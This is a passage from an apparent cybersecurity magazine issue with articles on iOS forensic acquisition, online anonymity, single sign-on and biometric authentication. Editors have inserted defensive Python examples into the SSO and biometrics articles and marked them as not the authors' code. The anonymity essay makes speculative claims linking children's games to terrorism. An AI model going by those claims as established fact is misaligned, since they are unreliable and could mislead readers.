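    print("archive sha256:", manifest["archive_sha256"])
    for entry in manifest["entries"]:
        print(f"{entry.sha256 or '-':64}  {entry.size:8d}  {entry.path}")
    print("verifies:", verify_archive(image, manifest))
```

Record the archive hash on the acquisition worksheet at the time of capture; re-running verify_archive on the stored TAR at any later point shows whether the image is still the one that was acquired.<br />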
Conclusion<br />
Jailbreak-free acquisition has numerous advantages over jailbreaks, and only two drawbacks. If your iOS<br />
device falls in the supported range of iOS 10.0 through 13.4.1, we strongly recommend sticking with the<br />
new, jailbreak-free acquisition method. If the iPhone you are analyzing is based on an unsupported<br />
platform, a compatible jailbreak may still be an option.<br />
About the Author<br />
Oleg Afonin is ElcomSoft’s security researcher and mobile forensic<br />
specialist. He is a frequent speaker at industry-known conferences<br />
such as CEIC, HTCIA, FT-Day, Techno Forensics and others. Oleg<br />
co-authored multiple publications on IT security and mobile<br />
forensics. With years of experience in the digital forensics and security<br />
domain, Oleg has led forensic training courses for law enforcement<br />
departments in multiple countries.<br />
Oleg can be reached online at (o.afonin@elcomsoft.com, https://twitter.com/elcomsoft or<br />
https://t.me/elcomsoft) and at our company website www.elcomsoft.com<br />
How to Maintain Anonymity in Communications?<br />
By Milica D. Djekic<br />
Kids love to play games. They are attracted not only to computer games, but also to games that are<br />
creative, engaging and demand imagination. As they play, they imagine that they are fictional characters,<br />
and the whole game takes on a deep meaning for them. That is how children build their personalities,<br />
psychology and minds. When they grow up, some of those habits stay with them. They may not express<br />
those sides of their personalities later, but they carry clear memories and subconscious drives about<br />
those experiences. We can never know what triggers a certain behavior in an adult as long as we are not<br />
familiar with their childhood and personal development. Some kids enjoy playing social games that<br />
develop their social intelligence and skills, while others choose a world of solitude, doing some reading,<br />
writing or drawing. Both cases can give prospective adults amazing creativity, and in our opinion it is<br />
important to find a balance between social and introspective skills. When parents are raising their kids,<br />
they should know that the best practice is to let their offspring become what they want to be, but some<br />
kind of supervision and advice is necessary in order to define the boundaries that the youth can expect in<br />
their lives and social connections. A well-applied measure for forming someone’s character is the model<br />
of rewarding and punishing, and proper family education must take that sort of teaching into account.<br />
One of the favorite games of many kids is making a call and talking to someone through a tissue. In<br />
such a game, they disguise their voice and become completely unrecognizable because they speak<br />
through some covering. They usually do so in company, for fun, joking with the people on the line.<br />
Basically, everything starts as an innocent kids’ game, and things stay under control as long as that<br />
behavior is just a way of playing. There are also children who make their voice unrecognizable in order to<br />
misrepresent themselves and make up an entirely fictional story about anything. Someone might say that<br />
their imagination could lead them far away,<br />
but the point is that if such behavior is not restricted at the beginning, it can cause serious trouble later<br />
on if that person does not quit the habit. In other words, those individuals could keep playing the<br />
“no one would see me” game and become a real concern to their surroundings. Any security professional<br />
would recognize that this is about someone who copes with a deep need to hide his identity, and those<br />
habits can be adopted early in childhood. So, in order to prevent a new generation of weird adults, it is<br />
necessary to follow the progress of children not only through schooling, but also through their social<br />
activities. If strict questions are asked in a psychological interview and anyone reports such strange<br />
behavior, some teaching measures should be applied. Practically, the next step in such a development<br />
could be that such individuals figure out that the phone line with the changed voice is no longer an<br />
interesting toy, so some kind of transfer into cyberspace could work better for them.<br />
The fact is that a computer with internet connectivity gives us plenty of opportunities to remain hidden<br />
behind some profile or account. In addition, entire anonymity solutions are being developed that let one<br />
stay anonymous and still be in a position to share a story or content with many. Indeed, these sorts of<br />
systems can be used for security purposes when it is necessary to protect your identity and exchange<br />
some vitally important information. So, the phone with the tissue over it is for the kids; real hackers rely<br />
on sophisticated cyber infrastructure. From that point of view, for some it is only business and many do it<br />
for the money, but there are still many unhealthy minds that choose their victims in order to bully them or<br />
feed fake news to communities. The main concern with Darknet anonymity systems is that they are<br />
role-based and use quite strong encryption, so in inaccessible spots there are difficulties confirming the<br />
identity of the person sharing the information. By places that are not easily approachable we have in mind<br />
terrorist groups that take advantage of such well-developed systems and send disinformation wherever<br />
they can. In other words, an innocent kids’ game can lead to a serious security concern, and from this<br />
perspective a Pandora’s box is opened, as so many questions arise about the motives in the heavy cases<br />
of committing such harsh crimes.<br />
Even a kid can grasp how significant it is to appear as a trusted person, and they may try to imitate the<br />
voice of an adult in order to trick or confuse someone. The situation is similar with the Darknet, as many<br />
of its users recognize the power of a trusted account, or at least of convincing someone that they are a<br />
trusted person. If anyone accepts that he is talking to a trusted individual, he may give information he<br />
normally would not, and the bad guys can use such a campaign to collect intelligence and figure out<br />
something they otherwise never would. Timing and accurate information can mean victory in a war, so it<br />
is of strategic significance to adopt measures and techniques in order to prevent, observe and respond to<br />
such and similar cases in practice.<br />
Who Is on the Other Side of the Cord?<br />
While carrying out anonymity operations, the bad guys go through an experience of believing that<br />
something very important is happening. Possibly they developed those needs in childhood, and they cope<br />
with very vivid inner experiences that motivate them to proceed with such activity. Their motto could be<br />
that no one will ever find out who is on the other side of the cord, so from their point of view doing so<br />
may appear quite exciting and interesting. The aim of terrorism is to spread fear and panic among<br />
community members, and that is why someone with a vivid imagination makes up such horrifying stories<br />
that are used to intimidate a broad population. Probably that special effect, suggesting “I know you, but<br />
you do not know me!”, deeply motivates the bad guys to believe they have some sort of power over other<br />
people’s lives and security. It is quite<br />
dangerous to play those games in adulthood, so what is needed is to understand the motives of the<br />
persons doing so, because once the motive is defined the crime would stop.<br />
Why Does Identity Matter?<br />
It is not only terrorist and criminal organizations that hide their identity; many defense professionals<br />
choose to carefully manage their identity as a security and privacy measure applied to their tasks. In<br />
other words, it is not smart at all to go around sharing everything you know with everyone, as that could<br />
be a huge threat to someone’s life and business. The well-known Deep Web solutions were designed by<br />
the defense communities, but at the moment they are available to anyone, for more or less obvious<br />
reasons. Identity matters in any case, and once people are convinced that some account is trusted, they<br />
may try to share a lot of findings with such a profile. Modern history teaches us how hard life can be and<br />
why it is important to take some measures of protection.<br />
Deep Web systems can be used by media staff to bring a story to the audience. Practically, anyone<br />
sitting at a computer and writing to a journalist could get approved as an information source for some<br />
media group because he can offer content frequently. That is how public opinion could be created and<br />
managed, and in our belief that is a dangerous weapon that can compromise media professionalism. No<br />
ethical media house trusts just anyone, and before anything is published there should be several levels<br />
of confirmation. In other words, anyone looking for exclusives on Tor should know that he is possibly<br />
working for the other side of the law.<br />
The Need to Hide Who You Are<br />
Sometimes intelligence sources reporting to a defense agency need to hide their identity for security<br />
reasons. The agent on the other side of the communication has a clear picture of who is talking to him.<br />
Also, security organizations can confirm a lot of that, so it is quite clear they would be highly confident<br />
about the sources of the information. Being a source of findings for anyone credible is a heavy and<br />
time-consuming task, and it requires reliability, accuracy and skill in order to be approved for such a<br />
service. Apparently, the defense staff hide who they are as well, because it is not necessary to know any<br />
personal details of that person, as the task is to provide helpful findings to the agency. How such an effort<br />
is further directed is not up to the informant; it is only up to that defense team.<br />
The Anonymity Information Exchange Systems<br />
The best-known privacy infrastructure worldwide is the Tor anonymity system, which serves millions of<br />
users every single day. From time to time that service gets shut down, but that is more about such a<br />
network’s configuration rules. Essentially, the Tor service offers good privacy and is mainly reliable to its<br />
users. It relies on multi-level encryption, so it is quite tricky for anyone to challenge its security<br />
capacities. Let’s say Tor is a quite trusted system that attracts many professionals from many areas of<br />
interest. Apparently, it also copes with its dark side, being one of the biggest Darknet service providers in<br />
the world. It has become a real oasis for criminals, terrorists and hackers, as it offers a lot of benefits to<br />
users seeking to remain safe.<br />
How Bad Guys Could Take Advantage of This<br />
Maintaining anonymous communications can be a real challenge, and many people across the globe<br />
cope with that fact. In particular, the bad guys know how to take advantage of such infrastructure, as<br />
they choose to stay invisible once the authorities come to get them. Some of their tactics show that they<br />
deal with many security and privacy accounts, and for that reason it can be difficult to track what they<br />
really do. Indeed, there are ways to figure out something, but the majority of their activities remain well<br />
camouflaged from investigators and intelligence officers, as they use many accounts, many different<br />
locations and plenty of machines, each with its own web connectivity. In many cases, it is even a<br />
challenge to identify the threat, as the entire search can be extremely time consuming. Once the first bad<br />
actor is found, there are better chances of locating the rest of his network.<br />
The Final Comments<br />
As we said, kids love to play games, and adults can keep those habits later on in their lives. Anyhow, our<br />
story can begin quite innocently, but the impacts of the illustrated behavior can be enormous. In our<br />
understanding, it is time to start thinking about whether we want to make any progress as humankind.<br />
The best way to use your brain cells is to observe the simple things in your environment. Once you<br />
become aware of what is going on around you, you start correlating things with each other and grasping<br />
the rules of those linkages. The task is hard, but, in our opinion, quite obtainable!<br />
About the Author<br />
Milica D. Djekic is an Independent Researcher from<br />
Subotica, Republic of Serbia. She received her engineering<br />
background from the Faculty of Mechanical Engineering,<br />
University of Belgrade. She writes for some domestic and<br />
overseas presses and she is also the author of the book<br />
“The Internet of Things: Concept, Applications and Security”,<br />
published in 2017 by Lambert Academic Publishing. Milica is<br />
also a speaker on the BrightTALK expert’s channel. She has<br />
been a member of ASIS International since 2017 and a<br />
contributor to the Australian Cyber Security Magazine since<br />
2018. Milica's research efforts are recognized by the Computer<br />
Emergency Response Team for the European Union (CERT-EU), Censys Press and the EASA European<br />
Centre for Cybersecurity in Aviation (ECCSA). Her fields of interest are cyber defense, technology and<br />
business. Milica is a person with disability.<br />
Everything You Want to Know About Single Sign-On<br />
By Ayman Totounji, Founder, Cynexlink<br />
Wikipedia defines Single sign-on or SSO as “an authentication scheme that allows a user to log in with a<br />
single ID and password to any of several related, yet independent, software systems.”<br />
Simply put, Single sign-on is a session or a user authentication service that allows a user to use a single<br />
set of login credentials—username and password—for multiple applications.<br />
In other words, you can gain access to several applications with just one username and password.<br />
This way, SSO simplifies password management for both businesses and individuals.<br />
An example of an SSO login is Google's products. For example, if you log into Gmail, you automatically<br />
get access to Google Drive, Google Photos, YouTube, and other Google services.<br />
How it Works<br />
Whenever you sign in to an SSO service, the service creates an authentication token that records that<br />
you have been verified. This authentication token is a piece of digital information stored either in the<br />
user’s browser or on the SSO service’s servers, like a temporary ID card issued to you.<br />
Any app that you access is authenticated through the SSO service. The SSO service passes the user's<br />
authentication token to the app and the user is granted access. A user who hasn't signed in through the<br />
SSO service yet will be required to do so first.<br />
However, an SSO service does not necessarily keep a record of the user itself, since it doesn't store user<br />
identities. Most SSO services work by checking user credentials against a separate identity management<br />
service.<br />
SSO simply confirms whether your login credentials match the identity in that database, without<br />
maintaining the database itself, just like a record-keeper who can look up records easily without having<br />
the entire catalog memorized.<br />
I think these steps will help you understand better how Single Sign-On functions:<br />
• The website first checks to see if you have already been approved by the SSO solution so that it<br />
can give you access to the site.<br />
• If you haven’t, it redirects you to the SSO tool to log in.<br />
• You are asked to enter your credentials.<br />
• The SSO solution asks your identity provider or authentication system to confirm your identity.<br />
• The SSO tool then transfers the authentication data to the website and takes you back to that site.<br />
• After sign-in, the site checks the authentication data it holds for you as you move through the site,<br />
confirming that you are authenticated each time you open a new page.<br />
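The steps above are easier to follow when both sides of the exchange are spelled out in code: an identity provider that checks the password once and issues a token, and two relying apps that accept the token instead of storing any password. The block below is an added example and is not code from the article or from any SSO product; the HMAC-signed JSON token format, the shared key and the app names "mail" and "drive" are assumptions chosen for illustration (real deployments use SAML or OpenID Connect, and the sample user is constructed). It also shows the checks a relying app should make before trusting a token: signature, audience, expiry and one-time use.<br />

```python
"""Minimal single sign-on round trip: one identity provider, two relying apps.

Added example; not code from the article or from any SSO vendor. The token
format (HMAC-signed JSON), the shared verification key and the app names
are assumptions for illustration; real systems use SAML or OpenID Connect.
"""
import base64
import hashlib
import hmac
import json
import os
import secrets
import time
from typing import Dict, Optional


class IdentityProvider:
    """Holds the user directory and issues short-lived, audience-bound tokens."""

    def __init__(self) -> None:
        self.key = secrets.token_bytes(32)            # shared with relying apps
        self._users: Dict[str, tuple] = {}            # username -> (salt, pbkdf2 digest)
        self._sso_sessions: Dict[str, str] = {}       # browser cookie -> username

    def register(self, username: str, password: str) -> None:
        salt = os.urandom(16)
        self._users[username] = (salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000))

    def login(self, username: str, password: str) -> Optional[str]:
        """Check the password once; on success return an SSO session cookie."""
        rec = self._users.get(username)
        if rec is None:
            return None
        salt, digest = rec
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
        if not hmac.compare_digest(digest, candidate):
            return None
        cookie = secrets.token_urlsafe(32)
        self._sso_sessions[cookie] = username
        return cookie

    def issue_token(self, cookie: str, audience: str, ttl: int = 60) -> Optional[str]:
        """If the browser holds a valid SSO session, mint a token for ONE app."""
        user = self._sso_sessions.get(cookie)
        if user is None:
            return None                               # caller must redirect to the login page
        payload = {"iss": "idp", "sub": user, "aud": audience,
                   "exp": int(time.time()) + ttl, "jti": secrets.token_hex(8)}
        body = base64.urlsafe_b64encode(json.dumps(payload, sort_keys=True).encode())
        sig = hmac.new(self.key, body, hashlib.sha256).digest()
        return body.decode() + "." + base64.urlsafe_b64encode(sig).decode()


class RelyingApp:
    """An application that trusts the IdP instead of storing passwords."""

    def __init__(self, name: str, verify_key: bytes) -> None:
        self.name = name
        self._key = verify_key
        self._sessions: Dict[str, str] = {}           # local session id -> user
        self._seen_jti: set = set()                   # replay protection

    def accept_token(self, token: str, now: Optional[int] = None) -> Optional[str]:
        """Validate signature, issuer, audience, expiry and one-time use; return a local session id."""
        try:
            body, sig = token.split(".")
            expected = hmac.new(self._key, body.encode(), hashlib.sha256).digest()
            if not hmac.compare_digest(expected, base64.urlsafe_b64decode(sig)):
                return None
            claims = json.loads(base64.urlsafe_b64decode(body))
        except (ValueError, TypeError):
            return None
        now = int(time.time()) if now is None else now
        if claims.get("iss") != "idp" or claims.get("aud") != self.name:
            return None                               # token minted for another app
        if claims.get("exp", 0) <= now or claims.get("jti") in self._seen_jti:
            return None                               # stale or replayed
        self._seen_jti.add(claims["jti"])
        sid = secrets.token_urlsafe(16)
        self._sessions[sid] = claims["sub"]
        return sid

    def current_user(self, sid: Optional[str]) -> Optional[str]:
        return self._sessions.get(sid) if sid else None


def demo_flow() -> Dict[str, object]:
    """One password entry, then access to two apps without re-entering it."""
    idp = IdentityProvider()
    idp.register("alice", "correct horse battery staple")       # constructed sample user
    mail, drive = RelyingApp("mail", idp.key), RelyingApp("drive", idp.key)
    cookie = idp.login("alice", "correct horse battery staple")
    mail_token, drive_token = idp.issue_token(cookie, "mail"), idp.issue_token(cookie, "drive")
    return {
        "anonymous_redirected": idp.issue_token("no-such-cookie", "mail") is None,
        "bad_password": idp.login("alice", "wrong") is None,
        "mail_user": mail.current_user(mail.accept_token(mail_token)),
        "drive_user": drive.current_user(drive.accept_token(drive_token)),
        "cross_app_rejected": drive.accept_token(mail_token) is None,
        "replay_rejected": mail.accept_token(mail_token) is None,
        "expired_rejected": mail.accept_token(idp.issue_token(cookie, "mail"),
                                              now=int(time.time()) + 3600) is None,
    }
```

Each token names a single audience and expires after a minute, so a token captured on its way to "mail" is useless at "drive" and cannot be replayed at "mail" either; that is the per-app scoping and short lifetime a practitioner should expect from an SSO deployment, since the identity provider is the one place where a password is ever checked.<br />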
What are the Benefits of Single Sign-On?<br />
SSO lets users access all of their apps with a single set of passwords and usernames. Here I have<br />
discussed some benefits of Single Sign-On service.<br />
Increasing Productivity:<br />
SSO boosts productivity. When all of the apps are placed in one convenient portal, it accelerates access<br />
to required systems and resources.<br />
With SSO in place, a user needs to log in once and get one-click access to all the apps they require.<br />
Although the amount of time saved might seem small, all of the time generally spent logging into<br />
individual resources adds up.<br />
SSO also reduces the time users spend on password-related hassles, since they only need a single<br />
password. This makes a real difference when you would otherwise have to manage some 40<br />
passwords.<br />
Therefore, users can focus on the important tasks rather than fiddling with multiple passwords.<br />
Minimizing Risk Associated with Bad Passwords Habits:<br />
Passwords can cut both ways. While they protect your data, they can be used to steal all of it if they<br />
get into the hands of a threat actor. That’s why they are often called a double-edged sword.<br />
On top of that, most passwords are not easy to remember, and typing them into each resource you need<br />
to get into is time-consuming. While changing your passwords regularly is important, it just adds to the<br />
frustration for some users.<br />
Enter SSO.<br />
If you use SSO, you are less likely to write passwords down, reuse passwords, choose simple or<br />
commonly used passwords, or resort to other bad password practices.<br />
Minimizing Helpdesk Costs:<br />
Given that SSO reduces the number of passwords in use, users are less likely to ask the IT department<br />
for password resets. This saves time and hassle, as resetting a simple password can eat up the<br />
helpdesk’s valuable time.<br />
According to one study, 20-50% of all help desk requests are for password resets. Providing a single set<br />
of credentials to employees will simply reduce this need.<br />
Improving Security Efficiencies:<br />
From a security viewpoint, it is natural to be concerned about using the same password for all the<br />
apps. What if your master password is stolen?<br />
Yes, relying on one password can make your systems vulnerable.<br />
But it is equally true that SSO can reduce password theft if used carefully.<br />
This is because users only need to remember a single password for many apps, meaning that they can<br />
focus on making that single password secure and strong.<br />
Plus, they are less likely to write it down, unlike multiple passwords, which often have to be noted<br />
down. In this way, it reduces the risk of password theft.<br />
Understanding the Types of Single Sign-On<br />
• ENTERPRISE SINGLE SIGN-ON acts as the primary authentication, intercepting login requests from<br />
secondary applications when needed in order to fill in the username and password fields. This lets<br />
one system interact with other systems, which might then disable their own login screens.<br />
• WEB SINGLE SIGN-ON or WEB SSO works with applications that are accessed online, and it<br />
verifies a user across multiple applications, eliminating the need to be identified again.<br />
A proxy server intercepts the access data and facilitates the communication, then transfers the<br />
results to the computer that requested them. Unidentified users are sent to an authentication<br />
service, which returns a successful login.<br />
• FEDERATED IDENTITY relies on an identity management solution that uses standards to let<br />
applications identify clients without having them go through the authentication process again<br />
and again.<br />
• OPENID is a decentralized SSO procedure that involves storing user IDs at a URL that any server<br />
can verify.<br />
What are the Challenges Associated with Single Sign-On<br />
• More robust passwords should be created. This is because if an SSO account is hacked, other<br />
accounts under the same authentication are easily exposed to the attack.<br />
• A breakdown of SSO at one site can affect all the linked sites. Therefore, it is important to<br />
choose the right SSO system. It should be reliable and equipped with plans to deal with<br />
interruptions.<br />
• Your SSO is affected by any problem at your identity provider. The provider's weakness or any<br />
interruption becomes your problem as well, and it may be beyond your control. Again, you need<br />
to work with a reliable vendor.<br />
• If a threat actor gets into your identity provider user account, all your linked systems become<br />
vulnerable at once. This is a classic single point of failure and should be addressed in the<br />
planning process. An efficient SSO provider ensures top-notch security.<br />
• SSO is not easy to set up because of the variety of environments involved.<br />
• SSO is not recommended for multi-user computers. After all, it causes real inconvenience and<br />
security issues if other users use a machine where someone’s accounts are still logged in.<br />
• Some SSO vendors may share your data with third parties.<br />
How to Choose a Single Sign-On Solution<br />
There are some key factors to consider while choosing a Single Sign-On Solution.<br />
Personalized User Experience:<br />
Check if the vendor lets you customize the login page to your corporate branding. After all, an efficient<br />
single sign-on process doesn't confine the users in a box where everything looks alike.<br />
Access to all the Apps You Require:<br />
Make sure your sign-on vendor lets you use all the apps you require.<br />
Security:<br />
Security is a crucial point to look for in a vendor. Make sure they protect your passwords and let you<br />
integrate with AD/LDAP for quick access to your data. Reliability is also key, as outages are often<br />
associated with these services. Therefore, make sure to work with one who ensures nearly 100%<br />
uptime so that your team can access their apps when they need them.<br />
Scalability:<br />
SSO solutions should grow with your organization. There is no use in changing vendors every now and<br />
then just because they are too big or too small for your needs.<br />
Bottom Line:<br />
By now you should understand the important things about SSO. It is a great solution to one big problem:<br />
how to manage the increasing number of users across a big ecosystem of apps and services.<br />
After all, it is not easy to memorize complex passwords as we use more and more systems in our daily<br />
lives.<br />
SSO lets us log in to different applications and services with just one identity. It eliminates the need to<br />
log in to each account again every time you disconnect from the service.<br />
However, an SSO service is not immune to issues such as outages and compromised passwords.<br />
Luckily, these things can be avoided by using strong passwords as well as working with an efficient SSO<br />
vendor.<br />
About the Author<br />
Ayman is the founder of Cynexlink. When Ayman founded Cynexlink, he<br />
had one core mission in mind: helping small- and mid-sized companies<br />
spend more time focusing on their core businesses. Could we impress<br />
you with his technical background? With his engineering degree from<br />
Damascus University, as a CCNP, CCVP, CCNA, CCDA, Cisco IPTX<br />
and VoIP specialist, being MCSE and A+ certified and having nearly 20<br />
years of experience in enterprise network design and architecture,<br />
network routing, switching, wireless, security, Cisco Unified messaging,<br />
CCME, UC500 Series, voice gateway and Cisco Unity – yes, we think<br />
we could.<br />
Ayman can be reached online at (aat@cynexlink.com) and at our company website -<br />
https://www.cynexlink.com<br />
LinkedIn | Twitter | 949.668.0682<br />
A Passwordless Future: Will Biometric Identification<br />
Replace Passwords?<br />
By Joshua Frisby, Founder of PasswordManagers.co<br />
From Face ID to scanning your fingerprint to unlock your phone, biometric authentication is weaved into<br />
almost every device that we rely on. It has been so seamlessly integrated that it has become somewhat<br />
second-nature in the digitally dominant world that we live in.<br />
While not needing to enter, or remember, a password is extremely convenient, we must ask: Will<br />
biometric authentication replace traditional passwords altogether? And most importantly: Is it safe?<br />
We have become so accustomed to using biometric authentication but the truth is that while biometrics<br />
offer many advantages, it also comes with several drawbacks. Let’s take a closer look.<br />
Is There a Need to Replace Passwords?<br />
Login details and credentials are susceptible to theft and are often targeted by hackers. In fact, Verizon’s<br />
Data Breach Investigations Report concluded that up to 81% of data breaches are due to hackers being<br />
able to gain access by leveraging weak, reused, or stolen passwords. With the level of exposure to<br />
cybercrime dependent on where you reside, having a fool-proof method to login into your accounts is<br />
crucial to secure digital infrastructures, devices, and identities.<br />
According to research conducted by LastPass, the average person can have up to 97 work-related<br />
passwords that they need to manage, and that’s not even including personal ones. It’s no shock that so<br />
many people reuse the same password; after all, we are only human. Unless you are a genius with<br />
the world’s best memory, it’s highly unlikely that you will be able to remember so many, let alone<br />
come up with complex combinations to ensure you use a unique, strong password for each account.<br />
With cybercrime on the rise, 55% of people would prefer a method of protecting accounts that doesn’t<br />
involve passwords. Enter biometric authentication.<br />
What Makes Biometrics a Good Alternative?<br />
Biometric data is unique to you, making it hard to steal and imitate. And so, biometrics are a serious<br />
contender for replacing passwords as the standard login method.<br />
Not only are we familiar with using our biometric data (face and fingerprint) to unlock our devices and in<br />
some cases, a handful of accounts, they also make the login process effortless. There is no need to type<br />
usernames or long complicated passwords. Take mobile banking apps as an example, what could be<br />
more convenient than simply scanning your finger on a reader to see your account balance? Or, even<br />
simpler, look at your phone’s camera to unlock your device via the built-in iris scanner.<br />
While convenience is nice to have, security is the primary concern. Because biometrics are more difficult<br />
to replicate than passwords, hackers cannot obtain your sensitive data with a simple phishing attack.<br />
This makes hacking data that is protected with biometrics much more difficult than password-protected<br />
data.<br />
We’ve touched on face-scanning but it is far more sophisticated than you may think. Facial recognition is<br />
rapidly gaining popularity and the algorithms that are used to analyze someone’s facial features are also<br />
becoming increasingly intelligent. For example, some facial recognition applications can differentiate a<br />
live subject from a picture, making it very difficult to spoof the facial recognition and gain unauthorized<br />
access to protected data.<br />
Capital is another driving force behind the development of biometrics. The biometrics market is estimated<br />
to be worth a staggering $49 billion by 2022 and huge investments are being made in the development<br />
of new algorithms and systems to improve biometric accuracy.<br />
Biometric authentication was first introduced to the mass market by smartphones such as the Apple<br />
iPhone and Samsung’s Galaxy range. Today, it is possible to use biometrics across a much broader<br />
range of applications. However, biometrics are not limited to devices and software, we can also use them<br />
to access physical spaces like our homes. This versatility makes for a better overall authentication<br />
method than passwords, especially when speed, ease of login, and security are all concerns.<br />
If biometrics are a better authentication method, why are we still using passwords? The answer is that<br />
biometrics are not perfect and they do have significant drawbacks that need to be addressed before we<br />
can fully embrace the passwordless revolution. While the technology is very promising and convenient,<br />
there’s certainly room for improvement before biometrics can claim to enjoy the same popularity that<br />
passwords do.<br />
What Are the Drawbacks of Biometric Authentication?<br />
While biometrics are very secure, they are also immutable.<br />
It is important to remember that biometric data has to be stored somewhere for applications to use it as<br />
an authentication method. The problem is that if these databases were to be hacked, your identity could<br />
become compromised.<br />
If your biometric data is ever compromised in one way or another, you could face serious repercussions.<br />
You can change passwords, you can’t change biometrics.<br />
Since biometrics can’t be changed, it would be impossible to ensure the safety of compromised accounts<br />
once hacked. This is where passwords have the upper hand. If your password is ever lost or stolen, you<br />
can simply log in to your account and change your credentials to make it secure again. This process can<br />
be repeated over and over again.<br />
Biometric authentication also comes with quite a few privacy concerns. Since biometrics inextricably link<br />
a user’s digital and physical identity, there are concerns that biometric data could be collected and abused<br />
by hackers. Since data privacy is a key concern, this could cap how widely biometric authentication is<br />
accepted as more people become aware of the potential downsides.<br />
It is also important to note that biometric authentication systems have not been around as long as<br />
password-based systems. Consequently, they suffer from more bugs and growing pains. False positives<br />
or negatives occur frequently, and this can lead to frustration when an authorized user is denied access<br />
or, more seriously, when the wrong person is granted access due to a false positive identification. A<br />
research team from New York University created an artificial intelligence platform that was able to<br />
successfully recreate full fingerprints from partial prints. The recreated fingerprints were able to fool a<br />
biometric authentication system 20% of the time.<br />
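The false positive and false negative trade-off described above is easiest to see with numbers. The Python below is an added example written for this edit, not code from the article or from any biometric vendor: the genuine and impostor match scores are constructed, and the threshold sweep shows why an operator cannot push false accepts to zero without also locking out legitimate users.

```python
# Constructed similarity scores in [0, 1] from a hypothetical fingerprint matcher.
# genuine  = a user's live print compared with their own enrolled template
# impostor = a different person's print (or a reconstructed partial print)
#            compared with that same template
GENUINE_SCORES = [0.92, 0.88, 0.85, 0.81, 0.79, 0.74, 0.70, 0.66, 0.61, 0.55]
IMPOSTOR_SCORES = [0.68, 0.62, 0.57, 0.51, 0.48, 0.44, 0.39, 0.35, 0.30, 0.22]


def false_accept_rate(impostor, threshold):
    """Share of impostor attempts accepted: the 'wrong person granted access' case."""
    return sum(s >= threshold for s in impostor) / len(impostor)


def false_reject_rate(genuine, threshold):
    """Share of legitimate users rejected: the 'authorized user denied access' case."""
    return sum(s < threshold for s in genuine) / len(genuine)


def sweep(genuine, impostor, thresholds):
    """(threshold, FAR, FRR) for each candidate threshold; raising the bar trades
    false accepts for false rejects and vice versa."""
    return [(t, false_accept_rate(impostor, t), false_reject_rate(genuine, t))
            for t in thresholds]


def equal_error_threshold(genuine, impostor, steps=100):
    """Threshold at which FAR and FRR are closest (the equal error rate point),
    a standard single-number summary of a matcher's accuracy."""
    best_gap, best_t = None, None
    for i in range(steps + 1):
        t = i / steps
        gap = abs(false_accept_rate(impostor, t) - false_reject_rate(genuine, t))
        if best_gap is None or gap < best_gap:
            best_gap, best_t = gap, t
    return best_t


def tune_for_security(genuine, impostor, max_far, steps=100):
    """Lowest threshold that keeps FAR at or below a target, and the FRR that
    legitimate users then pay for it. Returns (threshold, frr)."""
    for i in range(steps + 1):
        t = i / steps
        if false_accept_rate(impostor, t) <= max_far:
            return t, false_reject_rate(genuine, t)
    return 1.0, 1.0


if __name__ == "__main__":
    for t, far, frr in sweep(GENUINE_SCORES, IMPOSTOR_SCORES, [0.5, 0.6, 0.7]):
        print(f"threshold {t:.2f}: FAR {far:.0%}  FRR {frr:.0%}")
    print("equal error threshold:", equal_error_threshold(GENUINE_SCORES, IMPOSTOR_SCORES))
    print("zero-FAR setting (threshold, FRR):", tune_for_security(GENUINE_SCORES, IMPOSTOR_SCORES, 0.0))
```

On the sample scores, raising the threshold from 0.5 to 0.7 drives false accepts to zero but rejects three legitimate users in ten, which is exactly the frustration the paragraph above describes; the only real fix is a better matcher, not a different threshold.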
Last but not least, biometric authentication systems can often be biased against users who cannot easily<br />
submit biometrics. This includes handicapped people who may have experienced a change in their<br />
biometric details due to an injury. For example, a badly cut finger may lead to scarring that makes a<br />
fingerprint unrecognizable, and as a result, revokes access.<br />
Passwords Are Here to Stay<br />
Although the use of passwordless methods is on the rise, it seems that passwords will remain the<br />
mainstream authentication method for the near future. So, to make using passwords as simple and<br />
secure as possible, there are a few simple steps you can take.<br />
The key to having optimal online security is to ensure that all your passwords are unique and complex.<br />
It’s easy to base your passwords on something that is of personal significance to you such as your<br />
birthday or the name of a loved one, but this makes passwords easy to guess and is a hacker’s dream.<br />
Using a password generator to create complex passwords that cannot be guessed with ease is a simple<br />
and quick way to strengthen the security of your online accounts. But, to take the security of your<br />
passwords to the next level, you can store them in a fortified password vault cocooned in encryption.<br />
There’s a wide range of different password managers that can facilitate the secure storage of passwords<br />
whilst also offering the convenience of auto-filling credentials, making logging into sites as seamless as<br />
biometric authentication.<br />
You should also ensure that you never write down your passwords, save them in spreadsheets, or share<br />
them over text or email. Hackers can easily exploit these insecure methods. Changing passwords<br />
frequently also makes your accounts more secure and helps to keep hackers at bay.<br />
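The advice above (unique, complex passwords that are not built from personal details, kept in a vault) can be checked mechanically. The Python below is an added example for this edit, not code from the article or from PasswordManagers.co: it generates passwords from a cryptographic random source, estimates their entropy, flags ones that contain personal terms such as a birth year or a pet's name, and reports reuse across a small vault. The 60-bit floor, the character set and the sample vault are the example's own assumptions.

```python
import math
import secrets
import string

# Character classes for the generator. The 60-bit floor and the four-class rule
# are this example's assumptions, not a recommendation taken from the article.
LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase
DIGITS = string.digits
SYMBOLS = "!@#$%^&*()-_=+[]{};:,.?/"
ALPHABET = LOWER + UPPER + DIGITS + SYMBOLS


def generate_password(length: int = 20) -> str:
    """Draw characters from a CSPRNG (secrets) and require every class to be
    present, so the result cannot fall into a smaller class-restricted space."""
    if length < 4:
        raise ValueError("length must be at least 4 to cover all classes")
    while True:
        pw = "".join(secrets.choice(ALPHABET) for _ in range(length))
        if all(any(c in cls for c in pw) for cls in (LOWER, UPPER, DIGITS, SYMBOLS)):
            return pw


def entropy_bits(password: str) -> float:
    """Entropy if the password were drawn uniformly from the classes it uses.
    For human-chosen strings the real guess count is lower; this is an upper bound."""
    pool = sum(len(cls) for cls in (LOWER, UPPER, DIGITS, SYMBOLS)
               if any(c in cls for c in password))
    return len(password) * math.log2(pool) if pool else 0.0


def personal_info_hits(password: str, personal_terms) -> list:
    """The 'birthday or loved one's name' weakness: return the personal terms
    (3+ characters, case-insensitive) that appear inside the password."""
    low = password.lower()
    return [t for t in personal_terms if len(t) >= 3 and t.lower() in low]


def reused_passwords(vault: dict) -> dict:
    """Map every password shared by more than one account to those accounts."""
    by_pw = {}
    for account, pw in vault.items():
        by_pw.setdefault(pw, []).append(account)
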